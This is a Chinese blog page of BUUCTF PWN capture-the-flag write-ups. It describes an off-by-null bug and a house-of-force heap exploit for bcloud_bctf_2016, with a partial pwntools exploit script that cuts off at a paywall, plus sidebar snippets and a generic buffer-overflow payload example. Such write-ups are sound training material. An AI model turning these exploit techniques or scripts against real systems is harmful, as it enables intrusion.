BUUCTF-PWN刷题记录-9

最新推荐文章于 2025-03-11 13:09:32 发布
最新推荐文章于 2025-03-11 13:09:32 发布
阅读量1.7k 收藏 1
点赞数 1
分类专栏: BUU-PWN 文章标签: buffer python 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_44145820/article/details/105565953
版权
本文记录了作者在BUUCTF中解决PWN类问题的心得,包括bcloud_bctf_2016的house of force漏洞利用,通过控制top chunk大小实现内存攻击;wustctf2020_closed的重定向技巧,将stdout重定向到stdin;x_ctf_b0verfl0w中shellcode的编写,利用jmp esp实现控制流;以及mrctf2020_shellcode_revenge中生成符合特定字符范围的alphanumeric shellcode。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

目录

bcloud_bctf_2016(house of force)

在这里插入图片描述

有一个off-by-null漏洞,
在这里插入图片描述
这里只有name输满了0x40就会打印出第一次分配的地址
在这里插入图片描述
这里只要长度都输入了0x40,并且v2会有分配的地址,这样在strcpy(v2, &s)的时候会拷贝0x40+0x40+0x4个字节,这样v3中的数据就会覆盖top chunk的size
在这里插入图片描述
add中没有大小限制
在这里插入图片描述
add中因为malloc加了4导致我们无法利用unlink
在这里插入图片描述

漏洞利用

由于本题可以控制top chunk大小以及分配大小不受限制,我们考虑使用house of force
利用原理可以看这篇文章:BUUCTF-PWN gyctf_2020_force(house of force)
过程:

  1. 利用题目分析中的方法泄露heap 地址,并计算top chunk地址和size的偏移
  2. 利用house of force分配到size处,修改size和note 0,1,2分别为atoi_got,free_got,atoi_got
  3. 修改free_got为puts,泄露atoi地址,并把atoi_got修改为system
Exp
from pwn import *

r = remote("node3.buuoj.cn", 29198)
#r = process('./bcloud_bctf_2016')

context.log_level = 'debug'
DEBUG = 0
if DEBUG:
	gdb.attach(r, 
	'''	
	b *0x08048772
	x/10wx 0x0804B120
	c
	''')
elf = ELF('./bcloud_bctf_2016')
libc = ELF('./libc/libc-2.23_32.so')
one_gadget_16 = [0x45216,0x4526a,0xf02a4,0xf1147]
puts = elf.plt['puts']
read_got = elf.got['read']
atoi_got = elf.got['atoi']
free_got = elf.got['free']
size = 0x0804B0A0
note = 0x0804B120


menu = "option--->
最低0.47元/天 解锁文章
BUUCTF-PWN题记-19
weixin_44145820的博客
05-09 659
wustctf2020_name_your_catwustctf2020_name_your_dog wustctf2020_name_your_cat 在NameWhich函数中没有越界检查 我们调试看一下 0xffd31214就是char v3[40]的地址 而在0xffd3124c处就存放着函数返回地址 0xffd3124c-0xffd31214=0x38 0x38/8=7 所以我们name 7 就能修改这个返回地址了 Exp: from pwn import * r = remote
BUUCTF PWN方向 1-6题 详解wp
qq_62564422的博客
02-06 2542
构造payload:变量声明后顺序入栈,每个标识表示变量所占栈空间底部,s为输入的变量,则其需要覆盖的长度为0X3C~0X00(0X3C字节),0X00处表示返回地址值(4字节)需要覆盖;返回地址的数据(8字节)(被垃圾数 据覆盖后则改为访问之后地址)+(返回地址 地址数+1)(远程端使用了ubuntu18,ubuntu18以上版本调用64位程序中的system函数需要栈对齐,在执行system时有一个指令需要栈对齐 ,所以地址+1)而且这个空间是连续的,v1之后就是v2,他们的内存块是接在一起的。
学习笔记:buuctf pwn
RookieMOR的博客
06-18 565
学习笔记,有不对的请大家指出
BUUCTF Pwn mrctf2020_shellcode WP
最新发布
qq_33348179的博客
03-11 173
按理说构不成溢出 但是下面的汇编:跳跃到11D6 将buf的内容存到rax 并进行call。进行一次puts操作 再进行一次读取0x400字节的read 存到buf。先创建了buf(大小0x410) var4(大小0x4) 两个变量。没开NX 开了PIE。
buuctf——pwn题之旅(持续更新)
qq_42988973的博客
12-16 657
buuctf-pwn 的一些wp
BUUCTF-pwn题记22-7-30更新)
Morphy_Amo的博客
03-04 4454
BUUCTF题记
BUUCTF-PWN题记-14
weixin_44145820的博客
04-29 878
sctf_2019_easy_heap(块重叠,double free) sctf_2019_easy_heap(块重叠,double free) 这题原题目好像是在Ubuntu16下的,但是BUU上面是Ubuntu18,所以应该更简单一点 总的来说,这题应该是ciscn_2019_final_3的加强版吧,当然也有更简单的地方 首先,给了我们一块rwx的空间 add函数会给你conten...
BUUCTF-PWN题记25(IO file attack)
weixin_44145820的博客
08-14 1732
背景知识 在做关于IO FILE的攻击的时候,对其中涉及的数据结构的了解必不可少,以下是几个关键的数据结构 FILE 结构 定义在 libio.h 中,如下 struct _IO_FILE { int _flags; /* High-order word is _IO_MAGIC; rest is flags. */ #define _IO_file_flags _flags /* The following pointers correspond to the C++ strea
BUUCTF-PWN题记-22
weixin_44145820的博客
05-18 781
ciscn_2019_n_2(double free) ciscn_2019_n_2(double free) delete的时候有一个double free漏洞 利用思路: 先用一个double free把0x602060(chunklist)申请出来,这样我们就能先修改里面的指针了,先利用GOT表泄露libc,然后写入__free_hook的地址并使用编辑写入system地址就行 Exp: from pwn import * menu = "Your choice: " def add(con
BUUCTF-PWN题记-11
weixin_44145820的博客
04-22 924
wustctf2020_name_your_cat wustctf2020_name_your_cat
BUUCTF-PWN题记-16
weixin_44145820的博客
05-05 848
ciscn_2019_es_5(realloc double free)npuctf_2020_easyheap(off-by-one) ciscn_2019_es_5(realloc double free) 申请没有大小限制,数目上限为10 edit会调用realloc重新申请(其实不会的,因为大小不变) 如果edit就不能show了 看了一下这题没有什么明显漏洞,但是考虑到re...
BUUCTF-PWN题记-15
weixin_44145820的博客
04-29 795
0ctf_2016_warmup(ROP,利用alarm修改eax)SWPUCTF_2019_login(格式化字符串漏洞,字符串位于bss) 0ctf_2016_warmup(ROP,利用alarm修改eax) 不能执行shellcode 有一个缓冲区溢出 由于NX保护,我们只能考虑ROP 这里有一个小技巧,就是alarm函数 程序开始调用了alarm 如果我们之后再次调用alarm,...
BUUCTF-PWN题记-4
weixin_44145820的博客
04-10 1166
hitcontraining_secretgarden hitcontraining_secretgarden 这题需要使用double free size字段的高四位可以不为0
BUUCTF-PWN题记-8
weixin_44145820的博客
04-16 994
roarctf_2019_realloc_magic roarctf_2019_realloc_magic
BUUCTF-PWN题记-7
weixin_44145820的博客
04-15 1118
roarctf_2019_realloc_magic roarctf_2019_realloc_magic
BUUCTF-PWN题记-6
weixin_44145820的博客
04-14 935
picoctf_2018_are you rootciscn_2019_final_2 picoctf_2018_are you root 例行安全检查 菜单如下: 我们需要auth_level等于5才能get flag user结构体如下 struct USER{ char *name; long long auth_level; } 漏洞原理分析: 在login中分配了两次内存...
mrctf2020_shellcode_revenge
K1ose的博客
04-24 874
下载附件,checksec一下; 存在可读可写可执行的段; 看一下IDA pro的汇编; 和先前的题目类似,先read也给0x400bytes的字符串,然后compare一下eax和0; jg表示jump if greater,如果eax>0则跳转,否则eax为0,跳到另一个地址; 接下来看到很多判断语句,截取其中一部分进行分析; 这里比较al和`的大小,jle表示jump if less or equal,即小于等于; 如果al<=60h,则跳转到11DA,如果al<=7Ah,则跳
mrctf2020_shellcode详解
勿山几已
06-09 865
简单演示mrctf2020_shellcode解题步骤
buuctf-pwn入门
01-26
### BUUCTF PWN 类题目入门教程 #### 学习资源推荐 对于希望进入PWN挑战领域的新手来说,选择合适的教材和平台至关重要。王爽老师的《汇编语言》提供了基础理论支持,有助于理解底层操作原理[^1]。此外,《IDA Pro权威指南》能够帮助掌握逆向工程工具的使用技巧,这对解决PWN问题非常有帮助[^1]。 #### 实践平台建议 为了更好地练习技能并应用所学知识,在线实践环境不可或缺。BuuOJ是一个专门为CTF爱好者设计的学习与交流社区,其中包含了大量针对不同难度级别的PWN题目供玩家尝试解答[^2]。通过不断做题积累经验,可以逐步提高自己的技术水平。 #### 解决方案流程概述 当面对具体的PWN题目时,通常遵循以下几个步骤来构建解决方案: - **检测保护机制**:利用`checksec`命令查看目标程序启用了哪些安全防护措施; - **静态分析**:借助IDA Pro等反汇编器对二进制文件进行深入剖析,找出潜在漏洞点; - **编写Exploit脚本**:基于发现的安全缺陷精心构造攻击载荷; - **测试验证**:最后一步是在本地环境中反复调试直至成功获取Flag。 ```bash # 使用 checksec 工具检查可执行文件的安全特性 $ checksec ./vuln_program ``` ```python from pwn import * # 连接到远程服务器上的服务端口 conn = remote(&#39;example.com&#39;, 9999) # 发送恶意输入数据给存在缓冲区溢出漏洞的服务进程 payload = b&#39;A&#39; * offset + pack(address) conn.sendline(payload) # 接收返回的数据包以确认是否获得shell访问权限 response = conn.recv() print(response.decode()) ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值